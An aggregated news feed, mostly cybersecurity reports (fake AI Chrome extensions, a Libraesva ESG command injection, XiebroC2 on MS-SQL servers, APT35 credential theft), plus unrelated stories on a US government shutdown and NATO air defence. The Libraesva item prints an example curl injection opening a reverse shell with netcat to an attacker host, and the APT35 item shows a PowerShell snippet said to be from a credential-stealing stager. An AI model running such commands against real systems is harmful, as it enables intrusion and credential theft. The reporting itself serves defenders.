• A concerning cybersecurity trend has emerged as threat actors exploit the growing popularity of artificial intelligence tools by distributing malicious Chrome extensions masquerading as legitimate platforms.

    These deceptive extensions target users seeking convenient access to popular services like ChatGPT, Claude, Perplexity, and Meta Llama, creating a significant security risk for unsuspecting individuals and organizations.

    The malicious campaign represents a sophisticated evolution in browser-based attacks, leveraging the trust users place in mainstream browser extension stores and the widespread adoption of conversational intelligence platforms.

    These fake extensions initially appear functional, allowing users to type prompts directly into the Chrome search bar, creating an illusion of legitimate functionality while secretly executing malicious operations in the background.

    The threat has already demonstrated considerable reach and persistence, with previous iterations of similar campaigns affecting thousands of users.

    Palo Alto Networks analysts identified this renewed activity as part of a broader trend targeting browser extension ecosystems, highlighting the attackers’ strategic shift toward exploiting emerging technology trends to maximize their success rates.

    These malicious extensions operate through a carefully orchestrated infection mechanism that fundamentally compromises user browsing behavior and data security.

    The extensions achieve persistence by exploiting Chrome’s chrome_settings_overrides manifest permission, which allows them to permanently alter the browser’s default search engine configuration without explicit user consent or awareness.

    Technical implementation

    The technical implementation involves redirecting all search queries to attacker-controlled domains including chatgptforchrome[.]com, dinershtein[.]com, and gen-ai-search[.]com.

    This redirection mechanism effectively positions the malicious infrastructure as a man-in-the-middle, capturing sensitive user queries that may contain confidential information, personal data, or proprietary business intelligence.

    The threat actors have identified eight specific extension identifiers in their current campaign: akfnjopjnnemejchppfpomhnejoiiini (Claude search), boofekcjiojcpcehaldjhjfhcienopme (previously reported ChatGPT extension), bpeheoocinjpbchkmddjdaiafjkgdgoi (ChatGPT for Chrome), ecimcibolpbgimkehmclafnifblhmkkb (Perplexity Search), jhhjbaicgmecddbaobeobkikgmfffaeg (Chat AI for Chrome), jijilhfkldabicahgkmgjgladmggnkpb (GenAISearch), lnjebiohklcphainmilcdoakkbjlkdpn (ChatGPT Search), and pjcfmnfappcoomegbhlaahhddnhnapeb (Meta Llama Search).

    Distribution methods include sophisticated social engineering campaigns utilizing YouTube promotional content to entice installation, demonstrating the attackers’ understanding of modern digital marketing techniques and user acquisition strategies.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Beware! Threat Actors Distributing Malicious AI Tools as Chrome Extensions appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Managing endpoints effectively has become one of the most critical priorities for IT teams across organizations. With the growing number of devices, operating systems, and hybrid workforce requirements, businesses need smarter and more automated endpoint management solutions. This is where autonomous endpoint management (AEM) software comes into play offering complete visibility, control, automation, and security […]

    The post Top 10 Best Autonomous Endpoint Management Software In 2025 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybercriminals are turning a trusted file format against users in a sophisticated new attack campaign. MatrixPDF represents a concerning evolution in social engineering attacks that split malicious activities across multiple platforms to evade detection. PDF files have become the perfect trojan horse for cybercriminals. They slip through email security filters undetected, render inline within Gmail’s […]

    The post MatrixPDF Campaign Evades Gmail Filters to Deliver Malicious Payloads appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Research has uncovered three significant vulnerabilities in Google’s Gemini AI assistant suite, dubbed the “Gemini Trifecta,” that could have allowed cybercriminals to steal users’ saved data and live location information. The vulnerabilities, which have since been remediated by Google, demonstrate how artificial intelligence systems can become attack vectors rather than just targets. Illustration of a […]

    The post Google Gemini Vulnerabilities Let Hackers Steal Saved Data and Live Location appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The federal government is headed toward a shutdown Wednesday morning: Congress failed to pass any funding to kick off fiscal 2026, which will cause hundreds of thousands of federal employees to be furloughed and the rest of the civil service to continue working without immediate pay. 

    In a 55-45 tally, the Senate on Tuesday once again rejected a seven-week stopgap funding bill that would have kept agencies afloat through Nov. 21 after all but a few Democrats voted to block the measure. All Republicans supported the House-backed bill, but it failed to reach the 60-vote threshold necessary to pass it and keep government open.

    Agencies will shutter for the first time since 2019 amid President Trump’s continued threat to lay off large portions of the federal workforce. The Office of Management and Budget has directed agencies to consider issuing reduction-in-force notices to all employees whose salaries are funded by annual appropriations and who work on issues that are not Trump priorities. The president reiterated that threat on Tuesday. 

    “The Democrats want to shut it down, so when you shut it down, you have to do layoffs,” Trump said at the White House hours before funding lapsed. “So we'd be laying off a lot of people that are going to be very affected.”

    There is no connection between shutdowns and RIFs and the two have never been previously connected. Instead, agencies have placed portions of their workforces on unpaid furlough during a shutdown and brought them back when the government reopened. Employees funded through mechanisms other than annual appropriations, as well as those necessary to protect life and property, are considered either “exempted” or “excepted” and work throughout shutdowns on only the promise of backpay.

    As employees nervously await the administration’s plans on layoffs, about 550,000 of them will be sent home on furlough. Those employees are also guaranteed backpay when the government reopens. Another 1.57 million employees will remain at work while facing delayed paychecks. The 23% furlough rate is unusually low for modern shutdowns. 

    Already Tuesday evening, agencies began sending early notices to employees to notify them of whether they would be furloughed, according to copies viewed by Government Executive. Those messages reminded furloughed employees not to work during the shutdown, to monitor the news to stay apprised of when to return to work and that their back pay was guaranteed. Official notices were expected later Tuesday night or early Wednesday morning. 

    All federal employees will still report to their jobs Wednesday morning. Those who are leaving due to their furlough status will have a few hours to conduct any “closeout” work necessary for an “orderly shutdown” before they leave indefinitely. 

    Congress currently has no clear path to reopen government. Democrats continue to insist that Republicans address end-of-year premium increases set to hit those who receive health insurance through the Affordable Care Act as part of any funding deal. They are also looking to roll back Trump’s ability to rescind federal funds through impoundments. Republicans have remained steadfast that they will not negotiate over those issues until the government is reopened. 

    Senate Majority Leader John Thune, R-S.D., said his caucus was “not going to be held hostage.” 

    “Ladies and gentlemen, there isn't anything here to negotiate," Thune said Tuesday afternoon. “This is a routine funding resolution so that we can continue our routine appropriations work." 

    House Republicans, meanwhile, did not return to the Capitol this week after passing their continuing resolution last week. 

    Democrats throughout the day Tuesday said the ball was in Trump and Republicans’ court, while suggesting any layoffs that result from the shutdown were bound to occur anyway. 

    “The bottom line is he's doing it anyway,” Senate Minority Leader Chuck Schumer, D-N.Y., said. “It will fall on [Trump], as I said. He's the one doing the firings, not Democrats.”

    Most federal agencies sent a message to employees Tuesday afternoon with nearly identical language blaming congressional Democrats for the impasse for holding up a stopgap funding bill “due to unrelated policy demands.” 

    “A funding lapse will result in certain government activities ceasing due to a lack of appropriated funding,” agency leaders said to their workforces. “In addition, designated pre-notified employees of this agency would be temporarily furloughed.”

    Sen. Richard Blumenthal, D-Conn., said Trump “just seems to be on that path” toward slashing federal jobs, regardless of whether a shutdown had occurred. 

    “This president is incredibly cruel and mean spirited, so he may well engage in some totally unnecessary and punitive layoffs that save no money,” Blumenthal said. “I think the record shows that he is firing people regardless of the shutdown.”

    Sen. Chris Van Hollen, D-Md., said the shutdown would not materially change the current operations of government. 

    “Donald Trump has been shutting down the government,” said Van Hollen, whose state houses among the highest number of federal workers. “He's been shutting down the parts that he doesn't like, he's been super charging the parts that he likes. So we want to keep the government open, but no more blank check for Donald Trump.” 

    Just before the shutdown, the American Federation of Government Employees and Democracy Forward filed a lawsuit against the administration's plans, suggesting Trump and OMB Director Russ Vought had overstepped their legal authorities in recommending the RIFs. 

    “Announcing plans to fire potentially tens of thousands of federal employees simply because Congress and the administration are at odds on funding the government past the end of the fiscal year is not only illegal—it’s immoral and unconscionable,” AFGE President Everett Kelley said. 

    The Office of Personnel Management instructed agencies to prepare a "decisional memorandum” that documents the need for the layoffs. The Trump administration previously ran into legal trouble when courts determined that OPM and OMB did not have the authority to mandate workforce decisions within agencies, though the Supreme Court has since cleared a path for such directives.

    Any layoff notice sent at the outset of a shutdown is likely to have not yet taken effect by the time the government reopens. Agencies generally must provide 60-days notice to all impacted workers. OMB instructed agencies that they can update their layoff plans once the government reopens. 

    Thune said the Senate will take additional votes on Wednesday before adjourning on Thursday in observance of the Jewish holiday Yom Kippur. Lawmakers would then return on Friday and potentially stay through the weekend.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • RIGA, Latvia — If Russia again encroaches in NATO-member airspace, officials say they now have set expectations about how that nation will respond—and the list includes options from tracking the Russian aircraft to shooting them down.

    Over the past week, NATO leaders have been working to bring more “coherence [and] synchronization across all of the air policing activities,” one senior military official told Defense One Saturday at the NATO military committee meeting here. However,  NATO members still have to work through issues around specific authorities and rules of engagement, the official said. “Some countries have some legal limits. Some countries have some administrative limits that they must get political approval for. But it’s all being smoothed out.”

    Escalating Russian incursions have led to a variety of actions just this month, from shootdowns of Russian drones over Poland on September 10 to a NATO-led escort of fighter jets out of Estonia a little more than a week later. And top officials of NATO countries have promised swift responses. Poland, for instance, has said it will shoot down drones with or without NATO permission.

    Adm. Giuseppe Cavo Dragone, chair of the NATO military committee, said the rules of engagement for how NATO members respond vary tremendously by the threat level of each incident, such as whether the drones or jets are known to be armed. The determination may come down to the pilot or reach all the way up to the NATO Supreme Allied Commander Europe. Rules of engagement are a “tool that can evolve as far as the threat is changing,” he said.

    NATO military committee members spent much of the weekend discussing new assets and strategies to give individual members more options to deal with future incursions, as part of Eastern Sentry, which was launched Sept. 12 in response to the Polish incursion. The activity converts the air policing mission to a broad air defense mission. Denmark will likely soon contribute an anti-aircraft frigate and two additional F-35s to Eastern Sentry, according to an individual with knowledge of the discussions.

    The change from policing to air defense may not be obvious to the general public. But it will be significant behind the scenes, according to the senior NATO official. The difference is that, depending on the incursion, Eastern Sentry gives SACEUR elements to address the threat quickly— for instance, moving a battlegroup from Latvia quickly into Estonia and then returning it, to “mass our capabilities at the point of need,” the official said.

    The official said future incidents are likely, but they believe Russian President Vladimir Putin is not personally directing the incidents. Rather, they said, the incursions speak to a “culture” within the Russian military, which accepts a “higher degree of risk” for provocative actions.

    Still, NATO’s obligation now is to respond to each incident proactively. “If [Putin] sees a weakness in our response, you very well may see him start to hand-puppet,” as in direct future incursions himself, the official warned. 

    The meeting here Saturday occurred in the context of growing uncertainty about the future role of U.S. forces in Europe. While Trump has indicated that the United States is likely to stay in NATO, defense leaders such as Defense Secretary Pete Hegseth  have for months foreshadowed a potential drawdown of U.S. forces in Europe, and the new White House national defense strategy is likely to de-emphasize Europe as a chief U.S. national concern.

    When Defense One asked Dragone how prepared other NATO members are for fewer U.S. troops in Europe, he answered, “This is something that has been discussed a lot,” downplaying the concern as “normal” for any military alliance. 

    “Let’s assume that one of the allies, the bigger one, needs to reorient some of his energies [in] some other direction,” the official said. NATO countries, working together, will “rebalance everything in the most efficient and effective way… We’re going to work it out and face it like a big man.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In late September 2025, the Cybersecurity and Infrastructure Security Agency (CISA) issued a public alert regarding the active exploitation of a critical command injection vulnerability tracked as CVE-2025-59689 in Libraesva Email Security Gateway (ESG) devices.

    This flaw has rapidly emerged as a favored target for threat actors due to its ease of exploitation and the wide deployment of Libraesva ESG as a frontline defense in corporate and government email infrastructure.

    The vulnerability allows unauthenticated attackers to execute arbitrary system commands on affected appliances, resulting in a significant risk of email compromise, data exfiltration, and lateral movement within networks.

    Initial discovery of this security weakness surfaced after multiple security firms observed anomalous traffic directed at public-facing ESG appliances across Europe and North America.

    Attackers quickly weaponized proof-of-concept exploits, taking advantage of the flaw’s simple payload delivery—typically through a crafted HTTP POST request to an exposed management interface.

    Organizations relying on Libraesva ESG appliances for spam and phishing defense are directly at risk, with exploitation frequently resulting in full device takeover.

    CISA analysts noted that attackers leveraging CVE-2025-59689 did so with high speed and stealth, leaving minimal traces in security logs.

    Their investigations revealed that successful exploitation permitted payloads enabling remote shell access, installation of additional malware packages, and use of the ESG appliance as a pivot point for internal reconnaissance.

    Notably, CISA documented several incidents where attackers deployed reverse shells to establish persistent access channels post-compromise.

    The infection mechanism at the heart of CVE-2025-59689 is a classic OS command injection. An attacker submits a specially crafted request to the web-based management API with command payloads embedded in user-supplied parameters.

    For example:-

    curl - X POST "https://target-esg/management/api[.]php" - d '[cmd]=;nc - e /bin/bash attacker[.]com 4444'

    This command illustrates how the flaw enables an external actor to spawn a remote shell directly to the attacker’s system, bypassing authentication controls.

    CISA researchers found that many incidents occurred due to ESG appliances lacking recent security updates, underscoring the necessity for timely patching.

    Libraesva ESG Exploit Flow begins with external payload delivery and culminating in command execution and attacker control.

    The continued exploitation of CVE-2025-59689 reinforces the importance of robust patch management and vigilant monitoring of security infrastructure for signs of compromise.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post CISA Warns of Libraesva ESG Command Injection Vulnerability Actively Exploited in Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated attack campaign targeting improperly managed Microsoft SQL servers has emerged, deploying the XiebroC2 command and control framework to establish persistent access to compromised systems.

    The attack leverages vulnerable credentials on publicly accessible database servers, allowing threat actors to gain initial foothold and escalate privileges through a multi-stage deployment process.

    XiebroC2, a publicly available C2 framework similar to CobaltStrike, provides attackers with comprehensive remote control capabilities including information gathering, defense evasion, and system manipulation.

    The campaign follows a predictable pattern observed in MS-SQL server attacks, beginning with credential-based intrusions and progressing to coin mining operations.

    However, the integration of XiebroC2 represents a significant escalation in attack sophistication, as the framework supports cross-platform operations across Windows, Linux, and macOS environments.

    The framework’s open-source nature and extensive feature set make it an attractive alternative to commercial penetration testing tools, offering attackers capabilities such as reverse shells, file management, process control, and network monitoring without the associated costs.

    ASEC analysts identified the malware during routine monitoring of attacks targeting MS-SQL servers, confirming the deployment of XiebroC2 alongside traditional coin mining payloads.

    The framework’s implant component, written in Go programming language, demonstrates advanced techniques for evading detection while maintaining persistent communication with command and control infrastructure.

    XiebroC2’s GitHub page (Source – ASEC)

    The attack methodology highlights the ongoing vulnerability of database servers that lack proper security hardening and access controls.

    Privilege Escalation Through JuicyPotato Exploitation

    The attack chain demonstrates a methodical approach to privilege escalation through the deployment of JuicyPotato, a well-documented exploit tool that abuses Windows token privileges.

    Following successful authentication to the target MS-SQL server, attackers encounter the inherent limitation of service account privileges, which typically operate with restricted access rights by design.

    To overcome this constraint, the threat actors utilize JuicyPotato to exploit specific token privileges within the currently running process account, effectively elevating their access from service-level to administrative permissions.

    The privilege escalation technique capitalizes on the impersonation privileges often granted to service accounts, allowing the exploit to abuse these permissions and spawn processes with elevated rights.

    Once JuicyPotato successfully escalates privileges, attackers proceed to download and execute the XiebroC2 framework using PowerShell commands.

    This approach ensures that subsequent malicious activities operate with sufficient privileges to modify system configurations, install additional payloads, and establish persistent backdoors.

    MS-SQL service downloading XiebroC2 (Source – ASEC)

    The configuration data reveals the framework’s ability to collect comprehensive system information including process identifiers, hardware identifiers, working directories, and user credentials before establishing encrypted communication channels with the command and control server located at IP address 1.94.185.235 on port 8433.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Threat Actors Hijacking MS-SQL Server to Deploy XiebroC2 Framework appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A group of academics from KU Leuven and the University of Birmingham has demonstrated a new vulnerability called Battering RAM to bypass the latest defenses on Intel and AMD cloud processors. “We built a simple, $50 interposer that sits quietly in the memory path, behaving transparently during startup and passing all trust checks,” researchers Jesse De Meulemeester, David Oswald, Ingrid

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In recent months, a surge in targeted intrusions attributed to the Iranian-aligned threat group APT35 has set off alarm bells across government and military networks worldwide.

    First detected in early 2025, the campaign leverages custom-built malware to infiltrate secure perimeters and harvest user credentials.

    Initial indicators of compromise point to spear-phishing emails with HTML attachments that deploy a multi-stage payload once opened, silently establishing a foothold in the target environment.

    Analysis of the attack chain reveals that the initial vector often involves weaponized Microsoft Office documents exploiting CVE-2023-23397 to bypass Outlook’s security model.

    The embedded code downloads a PowerShell stager, which then fetches the primary credential-stealer module from a remote command-and-control (C2) server.

    Stromshield researchers identified this behavior during a compromise of a defense ministry network in April, noting the seamless transition from document exploit to stealthy reconnaissance and credential exfiltration.

    Once deployed, the malware masquerades as legitimate system processes to evade detection. It hooks into the Windows Security Support Provider Interface (SSPI) to intercept NTLM challenge-response exchanges, capturing hashed credentials in memory.

    These hashes are then relayed to the attacker’s infrastructure, where a combination of hash-cracking and pass-the-hash techniques unlock privileged accounts on high-value servers.

    The impact has been significant: multiple accounts within military communications networks were compromised without triggering conventional intrusion detection systems.

    In one documented case, the stager code resembles the following snippet, illustrating how the malware invokes SSPI hooks in PowerShell:-

    $sspi = Add-Type -MemberDefinition @"
        [DllImport("secur32.dll", CharSet=CharSet.Auto)]
        public static extern int LsaLogonUser(
            IntPtr LsaHandle, string OriginName, uint LogonType,
            uint LogonPackage, IntPtr AuthenticationInfo,
            uint AuthenticationInfoLength, IntPtr LocalGroups,
            IntPtr SourceContext, out IntPtr ProfileBuffer,
            out uint ProfileBufferLength, out uint LogonId,
            out IntPtr Token, out uint Quotas, out uint SubStatus);
    "@ -Name "Lsa" -Namespace "WinAPI" -PassThru

    Infection Mechanism

    The infection mechanism hinges on a two-stage downloader that first discerns the victim’s environment.

    Upon successful document exploit, the initial stager performs environment checks—querying registry keys for security tools and scanning loaded kernel modules.

    If a recognized analysis sandbox is detected, execution halts to thwart reverse-engineering efforts. Otherwise, the stager decodes a base64-encoded second-stage payload, writing it to %AppData%\Roaming\msnetcache.dll before loading it via rundll32.exe.

    Screenshot from viliam.ude-final[.]online (Source – Stormshield)

    This DLL implements the SSPI hook logic, intercepts credentials, and then performs HTTP GET requests to the C2 domain over port 443, blending traffic with legitimate HTTPS sessions.

    Overall, the campaign reflects APT35’s growing sophistication in embedding deep within trusted processes and leveraging native APIs to capture credentials without dropping overt artifacts.

    Continued vigilance and advanced behavioral monitoring are crucial to detect such stealthy intrusions before critical access is compromised.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post APT35 Hackers Attacking Government, Military Organizations to Steal Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶